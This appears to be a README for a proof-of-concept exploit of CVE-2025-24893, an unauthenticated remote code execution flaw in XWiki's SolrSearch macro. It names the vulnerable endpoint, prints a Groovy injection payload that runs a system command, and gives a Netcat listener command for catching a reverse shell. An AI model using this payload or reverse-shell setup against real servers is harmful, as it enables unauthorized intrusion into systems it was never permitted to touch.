CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

⚠️ Unauthenticated Remote Code Execution in XWiki
🛠️ PoC implementation by @dollarboysushil

💡 Overview

CVE-2025-24893 is a critical RCE vulnerability in XWiki, caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution (no authentication required).

• Severity: Critical (CVSS 9.8)
• Affected: Versions < 15.10.11, 16.4.1, 16.5.0RC1

---

🛠 Technical Breakdown

The vulnerability resides in the SolrSearch macro (Main.SolrSearch) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for arbitrary code execution.

🔥 Vulnerable Endpoint

/xwiki/bin/get/Main/SolrSearch?media=rss&text=

An attacker can inject Groovy code into the text parameter, which is evaluated server-side due to improper input handling within the macro system.

💥 Example Payload

}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

This leads to unauthenticated Remote Code Execution (RCE) on vulnerable XWiki instances.

🔬 Proof-of-Concept (PoC) Demonstration

🧪 Target Environment

The vulnerable target is an XWiki instance running version 15.10.8, which is affected by CVE-2025-24893.

---

📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

nc -lvnp 1337

---

🚀 Launching the Exploit

Run the exploit script CVE-2025-24893-dbs.py to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

---

💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

---

📚 References

• OffSec Blog: CVE-2025-24893 XWiki Groovy RCE
• NVD Entry: CVE-2025-24893